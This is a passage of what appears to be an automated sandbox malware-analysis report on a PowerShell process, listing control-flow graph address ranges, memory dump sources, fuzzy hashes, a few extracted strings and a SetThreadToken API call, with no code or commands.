                                                  control_flow_graph 211 6fe17b8-6fe17da 212 6fe1969-6fe197c 211->212 213 6fe17e0-6fe17e5 211->213 225 6fe197e-6fe198a 212->225 226 6fe1997-6fe19b5 212->226 214 6fe17fd-6fe1801 213->214 215 6fe17e7-6fe17ed 213->215 216 6fe1807-6fe180b 214->216 217 6fe1914-6fe191e 214->217 219 6fe17ef 215->219 220 6fe17f1-6fe17fb 215->220 223 6fe180d-6fe181e 216->223 224 6fe184b 216->224 221 6fe192c-6fe1932 217->221 222 6fe1920-6fe1929 217->222 219->214 220->214 228 6fe1938-6fe1944 221->228 229 6fe1934-6fe1936 221->229 223->212 244 6fe1824-6fe1829 223->244 232 6fe184d-6fe184f 224->232 233 6fe198c-6fe1991 225->233 234 6fe1992-6fe1996 225->234 230 6fe19bb-6fe19c0 226->230 231 6fe1b04-6fe1b20 226->231 236 6fe1946-6fe1966 228->236 229->236 237 6fe19d8-6fe19dc 230->237 238 6fe19c2-6fe19c8 230->238 253 6fe1b22 231->253 232->217 235 6fe1855-6fe1859 232->235 233->234 234->226 235->217 240 6fe185f-6fe1863 235->240 246 6fe1ab4-6fe1abe 237->246 247 6fe19e2-6fe19e4 237->247 241 6fe19cc-6fe19d6 238->241 242 6fe19ca 238->242 248 6fe1886 240->248 249 6fe1865-6fe186e 240->249 241->237 242->237 251 6fe182b-6fe1831 244->251 252 6fe1841-6fe1849 244->252 256 6fe1acc-6fe1ad2 246->256 257 6fe1ac0-6fe1ac9 246->257 254 6fe19e6-6fe19f2 247->254 255 6fe19f4 247->255 261 6fe1889-6fe1911 248->261 258 6fe1875-6fe1882 249->258 259 6fe1870-6fe1873 249->259 262 6fe1835-6fe183f 251->262 263 6fe1833 251->263 252->232 264 6fe1b2a-6fe1b34 253->264 265 6fe1b24-6fe1b25 253->265 266 6fe19f6-6fe19f8 254->266 255->266 267 6fe1ad8-6fe1ae4 256->267 268 6fe1ad4-6fe1ad6 256->268 269 6fe1884 258->269 259->269 262->252 263->252 272 6fe1b36-6fe1b42 264->272 273 6fe1b44 264->273 265->253 271 6fe1b27-6fe1b29 265->271 266->246 274 6fe19fe-6fe1a16 266->274 275 6fe1ae6-6fe1b01 267->275 268->275 269->261 271->264 280 6fe1b46-6fe1b48 272->280 273->280 285 6fe1a18-6fe1a1e 274->285 286 6fe1a30-6fe1a34 274->286 281 6fe1b7c-6fe1b86 280->281 282 6fe1b4a-6fe1b50 280->282 289 6fe1b88-6fe1b8d 281->289 290 6fe1b90-6fe1b96 281->290 287 6fe1b5e-6fe1b79 282->287 288 6fe1b52-6fe1b54 282->288 292 6fe1a22-6fe1a2e 285->292 293 6fe1a20 285->293 299 6fe1a3a-6fe1a41 286->299 288->287 295 6fe1b9c-6fe1ba8 290->295 296 6fe1b98-6fe1b9a 290->296 292->286 293->286 300 6fe1baa-6fe1bc1 295->300 296->300 302 6fe1a48-6fe1aa5 299->302 303 6fe1a43-6fe1a46 299->303 305 6fe1aaa-6fe1ab1 302->305 303->305
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4l$4l
                                                  • API String ID: 0-3555498266
                                                  • Opcode ID: 7e75761618b83560c0223046a0091f833a09ac610775c6d4fbb979474b82ed58
                                                  • Instruction ID: 0cbf0a7411f958cccd0250daf1d861d9fb917f05970eb0d050850c05e490825e
                                                  • Opcode Fuzzy Hash: 7e75761618b83560c0223046a0091f833a09ac610775c6d4fbb979474b82ed58
                                                  • Instruction Fuzzy Hash: 75B12032F042059FDB64DB6E98406BEBFE6AFC9220F18C0BBD5458B256DB31C945C7A1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 379 8157558-815759b 380 81575a3-81575cf SetThreadToken 379->380 381 81575d1-81575d7 380->381 382 81575d8-81575f5 380->382 381->382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2244628161.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8150000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ThreadToken
                                                  • String ID:
                                                  • API String ID: 3254676861-0
                                                  • Opcode ID: e2b543535c5b6bdff18bc580d818ad82c081e8a86b12306536d400c2fb6386f3
                                                  • Instruction ID: f0faf3e414b31c413e91b8677e04680af09179511dad6b413914ab3825f8e412
                                                  • Opcode Fuzzy Hash: e2b543535c5b6bdff18bc580d818ad82c081e8a86b12306536d400c2fb6386f3
                                                  • Instruction Fuzzy Hash: E31158B19006498FCB10DFAEC584BAEFFF4EF49320F248859D419A3250C778A941CFA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 385 8157560-81575cf SetThreadToken 387 81575d1-81575d7 385->387 388 81575d8-81575f5 385->388 387->388
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2244628161.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8150000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ThreadToken
                                                  • String ID:
                                                  • API String ID: 3254676861-0
                                                  • Opcode ID: 978b6d944dee5c9ba4a68637dfc9b115a84d62163f85992970080de9da54e7b9
                                                  • Instruction ID: afa012502adc42527ccbde695c39190f8cbdce66c59e5bb5c957e0faf2432071
                                                  • Opcode Fuzzy Hash: 978b6d944dee5c9ba4a68637dfc9b115a84d62163f85992970080de9da54e7b9
                                                  • Instruction Fuzzy Hash: 3D11F5B59002488FCB10DF9AC545B9EFBF8EF48320F248859D519A7250D778A944CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 391 44370a8-44370c7 392 44371cd-443720b 391->392 393 44370cd-44370d0 391->393 420 44370d2 call 4437744 393->420 421 44370d2 call 443775f 393->421 394 44370d8-44370ea 396 44370f6-443710b 394->396 397 44370ec 394->397 403 4437111-4437121 396->403 404 4437196-44371af 396->404 397->396 406 4437123 403->406 407 443712d-4437138 403->407 409 44371b1 404->409 410 44371ba-44371bb 404->410 406->407 422 443713b call 443c000 407->422 423 443713b call 443bff0 407->423 409->410 410->392 413 4437141-4437145 414 4437147-4437157 413->414 415 4437185-4437190 413->415 416 4437173-443717d 414->416 417 4437159-4437171 414->417 415->403 415->404 416->415 417->415 420->394 421->394 422->413 423->413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (nq
                                                  • API String ID: 0-2756854522
                                                  • Opcode ID: 0784a1e1776388c9f8e74122596b1e851f73351f90177e94bb8ef2f2432bd32d
                                                  • Instruction ID: ff024574f4c2a4f474a8bebff3fd441e23c5de98ff39e06526a5a3a5527040d5
                                                  • Opcode Fuzzy Hash: 0784a1e1776388c9f8e74122596b1e851f73351f90177e94bb8ef2f2432bd32d
                                                  • Instruction Fuzzy Hash: 8E417E75B042048FDB14CF68C854AAE7BF5EF8D712F1480A9D446AB3A1DB35EC01CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 424 443ae08-443ae99 431 443aea3-443aeae 424->431 443 443aeb1 call 443af40 431->443 444 443aeb1 call 443af50 431->444 432 443aeb7-443af3c call 443911c 443->432 444->432
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [gn^
                                                  • API String ID: 0-794240663
                                                  • Opcode ID: 1e14dd3005a3d4cc29b5cd884ce11a6ab5cabc1c5afb5bd566988999bed25083
                                                  • Instruction ID: 4ebcd5f14a28b5d61be46062989cb92a64e1b111dae159af35aba3522baaeac9
                                                  • Opcode Fuzzy Hash: 1e14dd3005a3d4cc29b5cd884ce11a6ab5cabc1c5afb5bd566988999bed25083
                                                  • Instruction Fuzzy Hash: 21319574A002059FFB04EFA4D554AFF7BB6EF89304F1184A9D511AB3A5CE38AD41CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 445 443b078-443b07f 446 443b086-443b08a 445->446 447 443b081 call 443aa64 445->447 448 443b09a-443b135 446->448 449 443b08c-443b099 446->449 447->446 456 443b137-443b13d 448->456 457 443b13e-443b15b 448->457 456->457
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (&jq
                                                  • API String ID: 0-3222446104
                                                  • Opcode ID: a68384b895d71a5a435b692b3b239a2aebc8c6d3aa4fe4497269ee32e367edf8
                                                  • Instruction ID: 4d61229d39cc2daf4041be94ef267975a1a2378d1c0026ab6269285b8963bccb
                                                  • Opcode Fuzzy Hash: a68384b895d71a5a435b692b3b239a2aebc8c6d3aa4fe4497269ee32e367edf8
                                                  • Instruction Fuzzy Hash: 3A219F71A042598FDB14DBAED500BAFBFF5EB89720F24846AD418A7350CB34A905CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 460 443ae18-443aeae 479 443aeb1 call 443af40 460->479 480 443aeb1 call 443af50 460->480 468 443aeb7-443af3c call 443911c 479->468 480->468
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [gn^
                                                  • API String ID: 0-794240663
                                                  • Opcode ID: dbe453ad4e70a137503f902904325625da1f4f430267bb55ff4e85dcee3641f2
                                                  • Instruction ID: 0a0458fc712991288805865721d0e0506d7ca15064c323064f0724c3e1568908
                                                  • Opcode Fuzzy Hash: dbe453ad4e70a137503f902904325625da1f4f430267bb55ff4e85dcee3641f2
                                                  • Instruction Fuzzy Hash: 933144B4A002059FFB04EFA4D554ABEBBB6EF88304F108469D511AB3A5DE79ED418B50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 481 443de40-443de4d 482 443de4f-443de70 481->482 483 443de0e-443de30 481->483 491 443de73 call 443dfa1 482->491 492 443de73 call 443dfb0 482->492 493 443de73 call 81577c8 482->493 494 443de32 call 443de40 483->494 495 443de32 call 443de50 483->495 487 443de75-443df9e 489 443de38-443de3b 491->487 492->487 493->487 494->489 495->489
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;.gn^
                                                  • API String ID: 0-3818021283
                                                  • Opcode ID: 4fbfcdce0938cc02b7d7979c0bac4d4b48d8b0173833ac3ce04075ffa26f20cc
                                                  • Instruction ID: af57abb8aefd79993e59e965b7e224007ea0ec845662928cffa2daff5f26baac
                                                  • Opcode Fuzzy Hash: 4fbfcdce0938cc02b7d7979c0bac4d4b48d8b0173833ac3ce04075ffa26f20cc
                                                  • Instruction Fuzzy Hash: 8D017631B0050087EB14962DE8009EEBBAACFCDA32F04C07BE409C7A81DF35A90AC7C0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 496 443ddef-443ddfd 497 443ddff-443de15 496->497 498 443ddbe-443ddc8 496->498 501 443de17 497->501 502 443de1e 497->502 501->502 503 443de26-443de30 502->503 505 443de32 call 443de40 503->505 506 443de32 call 443de50 503->506 504 443de38-443de3b 505->504 506->504
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;.gn^
                                                  • API String ID: 0-3818021283
                                                  • Opcode ID: 8a28ebbf881332a908dd0b04e8e05850be8ea79457f3e5e4a4b15f9cbaa76b30
                                                  • Instruction ID: c3058a69cb16c2c6596b96eee85113056e8ef1b376ed336ebdc5a274447a3544
                                                  • Opcode Fuzzy Hash: 8a28ebbf881332a908dd0b04e8e05850be8ea79457f3e5e4a4b15f9cbaa76b30
                                                  • Instruction Fuzzy Hash: 3DF0597170474147E725662EB801AEBBFE9CFCA531F04806BE009C7641EF28A8068395

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 507 443de00-443de15 509 443de17 507->509 510 443de1e 507->510 509->510 511 443de26-443de30 510->511 513 443de32 call 443de40 511->513 514 443de32 call 443de50 511->514 512 443de38-443de3b 513->512 514->512
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;.gn^
                                                  • API String ID: 0-3818021283
                                                  • Opcode ID: 535a6a874307c9391ec722f6c87f7d404ce19eb115fe4157a08ba71e8cd13fd0
                                                  • Instruction ID: 819bb68d0e48af698faa5d1b5b50009a0852b4e57091dddf969794159510e482
                                                  • Opcode Fuzzy Hash: 535a6a874307c9391ec722f6c87f7d404ce19eb115fe4157a08ba71e8cd13fd0
                                                  • Instruction Fuzzy Hash: 48E0C231700A14179629A62EA80099FBBEEDFC9A72704802EE41AC7344DF68ED0587D5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 601 44329f0-4432a1e 602 4432af5-4432b37 601->602 603 4432a24-4432a3a 601->603 607 4432c51-4432c61 602->607 608 4432b3d-4432b56 602->608 604 4432a3f-4432a52 603->604 605 4432a3c 603->605 604->602 612 4432a58-4432a65 604->612 605->604 610 4432b5b-4432b69 608->610 611 4432b58 608->611 610->607 618 4432b6f-4432b79 610->618 611->610 613 4432a67 612->613 614 4432a6a-4432a7c 612->614 613->614 614->602 619 4432a7e-4432a88 614->619 620 4432b87-4432b94 618->620 621 4432b7b-4432b7d 618->621 623 4432a96-4432aa6 619->623 624 4432a8a-4432a8c 619->624 620->607 622 4432b9a-4432baa 620->622 621->620 625 4432baf-4432bbd 622->625 626 4432bac 622->626 623->602 627 4432aa8-4432ab2 623->627 624->623 625->607 632 4432bc3-4432bd3 625->632 626->625 628 4432ac0-4432af4 627->628 629 4432ab4-4432ab6 627->629 629->628 633 4432bd5 632->633 634 4432bd8-4432be5 632->634 633->634 634->607 637 4432be7-4432bf7 634->637 638 4432bf9 637->638 639 4432bfc-4432c08 637->639 638->639 639->607 641 4432c0a-4432c24 639->641 642 4432c26 641->642 643 4432c29-4432c34 641->643 642->643 645 4432bc1-4432bd3 643->645 646 4432c35-4432c50 643->646 645->633 645->634
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b00d26ba2495e563f6a9b684a2baab44bc3dc2902b7e1f674ccb6320367f57a9
                                                  • Instruction ID: e1ec520a7d730a3ccf4066ad09989657715aefa09c1f2294c19e5a223bf819e0
                                                  • Opcode Fuzzy Hash: b00d26ba2495e563f6a9b684a2baab44bc3dc2902b7e1f674ccb6320367f57a9
                                                  • Instruction Fuzzy Hash: 41918C74A00205CFCB15CF59C5989AEFBB1FF88711B24869AD815AB3A5C735FC91CBA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 648 443bb90-443bb98 649 443bbcb 648->649 650 443bb9a-443bbc5 648->650 651 443bb58-443bb69 649->651 652 443bbcc-443bc30 649->652 650->649 655 443bb70-443bb89 651->655 656 443bb6b 651->656 660 443bc32 652->660 661 443bc36-443bc41 652->661 656->655 660->661 662 443bc43 661->662 663 443bc46-443bca0 call 443b078 661->663 662->663 670 443bca2-443bca7 663->670 671 443bcf1-443bcf5 663->671 670->671 672 443bca9-443bccc 670->672 673 443bcf7-443bd01 671->673 674 443bd06 671->674 676 443bcd2-443bcdd 672->676 673->674 675 443bd0b-443bd0d 674->675 677 443bd32 675->677 678 443bd0f-443bd30 675->678 679 443bce6-443bcef 676->679 680 443bcdf-443bce5 676->680 681 443bd3a-443bd3e 677->681 682 443bd35 call 443aa58 677->682 678->681 679->675 680->679 683 443bd40-443bd69 681->683 684 443bd77-443bda6 681->684 682->681 683->684
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d4e9e833adca79e4c20b9a4dc2fa27138e62289bf836fa401ba28b1f57ed4806
                                                  • Instruction ID: eaef46b9039fdbe8f8b858e01797e8e38fab13393fa2971eb5aaba8421929c44
                                                  • Opcode Fuzzy Hash: d4e9e833adca79e4c20b9a4dc2fa27138e62289bf836fa401ba28b1f57ed4806
                                                  • Instruction Fuzzy Hash: 06716871E00288CFDB14DFA9D584B9EFBF1EF88714F14806AE819AB365DB34A945CB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e67e9953944b05a143469c5874cb58b97b619fdafe41fc1ddc136120e63eb881
                                                  • Instruction ID: 83182bc9edf36d93175d9f5f73363766e1d509635f203e010aea6f062278b2ff
                                                  • Opcode Fuzzy Hash: e67e9953944b05a143469c5874cb58b97b619fdafe41fc1ddc136120e63eb881
                                                  • Instruction Fuzzy Hash: C3613371E002489FDB14CFA9C584B9DBBF1EF88714F24816AE809AB365EB34AD45CB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20e77a5592f4a7e4f645056596b66163c339fbae7866517f38b6117cbc9b5f94
                                                  • Instruction ID: 75304069eea19c7cd8b24469ba58c6f6bcfa352b18ae8fa6533751865b39b15b
                                                  • Opcode Fuzzy Hash: 20e77a5592f4a7e4f645056596b66163c339fbae7866517f38b6117cbc9b5f94
                                                  • Instruction Fuzzy Hash: E351FFB07042049FEB088B79D844A2B77EAFFC8715F14846AE449CB356EB35EC02CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9649491c18bd7c73c39597c3fab8d8665653998e008293c3b2068abd10d82896
                                                  • Instruction ID: 9aca67ba2219f461c3959f34d2927ed2b8ed456a2c20680b8285244057f425c0
                                                  • Opcode Fuzzy Hash: 9649491c18bd7c73c39597c3fab8d8665653998e008293c3b2068abd10d82896
                                                  • Instruction Fuzzy Hash: 4041D3309093819FCB07CF28C9A49EABF70FF4A720B1505DBC4918B2A2C766EC45CB65
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 760ba2eb0b9c2bd98fcdc7f4f882c3feb56a6330e9e53c613a6bb3dc54ee8b48
                                                  • Instruction ID: b7345aeb4c53456416dd738fd52d5fc7059beb1855034b1c0d8da67ab1cdd95d
                                                  • Opcode Fuzzy Hash: 760ba2eb0b9c2bd98fcdc7f4f882c3feb56a6330e9e53c613a6bb3dc54ee8b48
                                                  • Instruction Fuzzy Hash: 5E412774A005059FCB05CF59C6989AEFBB1FF48711B21869AD815AB364C772FC91CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8400879a8be154a44a949c52b42dddec6e339ce564c6ea6daa9d5826e521f0c5
                                                  • Instruction ID: f23d9111abb30e478f7d6ed7eec6adcc90f97c56b1303b066014964cd8322e33
                                                  • Opcode Fuzzy Hash: 8400879a8be154a44a949c52b42dddec6e339ce564c6ea6daa9d5826e521f0c5
                                                  • Instruction Fuzzy Hash: AD31A035B002058BCB18DF68D4586AEBBF6EF8D721F24416AD806E73A0CF35AC41CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fffb4e9937ad58ea28869d4e2df757515857ab109f1138f18d2a420ac65ecd9
                                                  • Instruction ID: a74aa3109d11ef17b3cac002534fee3b9b2d9173453497d8f623c7ee1956a85b
                                                  • Opcode Fuzzy Hash: 6fffb4e9937ad58ea28869d4e2df757515857ab109f1138f18d2a420ac65ecd9
                                                  • Instruction Fuzzy Hash: 9E318D353002019FD709EB78E844A9ABBAAEFC8715F00817AD60ACB365DF74E905CB91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4aa3fdc8f4fa0b3154f3a923b90a98618f9a9b4d64bf947f16346f3c63654861
                                                  • Instruction ID: a3b6f3ef8a2a4aff16468f0d323109e5b29100c35126aab9593e19683c90c054
                                                  • Opcode Fuzzy Hash: 4aa3fdc8f4fa0b3154f3a923b90a98618f9a9b4d64bf947f16346f3c63654861
                                                  • Instruction Fuzzy Hash: B6311C75B001058FCF14CF64C954AAEBBF5AF8D712F1490A9D846AB355DB31EC01CB60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 10c0f3147dcc808785825a4f132f39ae35dd6c6fef0b2165fdb8a725efd096b4
                                                  • Instruction ID: 23eec81e45e4412a57e06a36735ab89222fad566c130cdec78d4445b9ecf3089
                                                  • Opcode Fuzzy Hash: 10c0f3147dcc808785825a4f132f39ae35dd6c6fef0b2165fdb8a725efd096b4
                                                  • Instruction Fuzzy Hash: F2315C71A002099FDB08DFB9D594BAEBBF6EF88711F14802AE405E7351EB35AC458F90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 751f694547f47c2645c7027e5ef7c929e0cf42e44b875dd73913b823b7d445bf
                                                  • Instruction ID: 83b9615305594ba413d04bef639b8dc067287c28c6d9819110426de22a393293
                                                  • Opcode Fuzzy Hash: 751f694547f47c2645c7027e5ef7c929e0cf42e44b875dd73913b823b7d445bf
                                                  • Instruction Fuzzy Hash: 9C314C70A002099FDB08DFA9D5947AEBBF6EF88711F10802AE405EB354EA35AC418F50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d141dbf78b2c1ada6482c14a10685823f62c5c48bd8dbe9551e6479c74b231de
                                                  • Instruction ID: 526f686288d11de84eb535264c92a76028b06b6723cb8232e345b20ca5bc3d8c
                                                  • Opcode Fuzzy Hash: d141dbf78b2c1ada6482c14a10685823f62c5c48bd8dbe9551e6479c74b231de
                                                  • Instruction Fuzzy Hash: 783189B2A053448EEB60CF6AD0887DAFBF2EF88721F28841AD41997205D7B86481CB54
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8454e0582ec06d73e50195b5feaaf650a05c1191343b12bba9c83f86ad80624
                                                  • Instruction ID: b6d4f12b14e5253243040c74c8147ba4a8a0bd3410756993c45973be020d2d2a
                                                  • Opcode Fuzzy Hash: f8454e0582ec06d73e50195b5feaaf650a05c1191343b12bba9c83f86ad80624
                                                  • Instruction Fuzzy Hash: 70312374B002048FCB18DF68D458AAEBBF6AF8C714F14546AE806EB360DF34AC41CB94
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201034611.000000000431D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0431D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_431d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 58477bbad3fbce1e021abd737737a5d19e82773e2c0e1bf1ddc51c7da8d755ac
                                                  • Instruction ID: aecb904d95181050321c8aafe616cb69b75fa387a24a26e4fa2a0a194c3f4ec8
                                                  • Opcode Fuzzy Hash: 58477bbad3fbce1e021abd737737a5d19e82773e2c0e1bf1ddc51c7da8d755ac
                                                  • Instruction Fuzzy Hash: 4721F471604200EFCB09CF54D9C0B26BF65FB88314F24C5ADE9090A266C73AE456DBA2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201034611.000000000431D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0431D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_431d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b7171afc5627fb9b3de698de9a8d8ba10975504fc8f4df476f1f8a6e7a27600
                                                  • Instruction ID: 564ab7dcbddd1f637e733f185d4410328a904ab35c8591b7478e1411b7094919
                                                  • Opcode Fuzzy Hash: 2b7171afc5627fb9b3de698de9a8d8ba10975504fc8f4df476f1f8a6e7a27600
                                                  • Instruction Fuzzy Hash: 29212975604644DFCB18DF24D9C0B26BF65FB84314F24C56DDA0A4B366C33AE446CB61
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
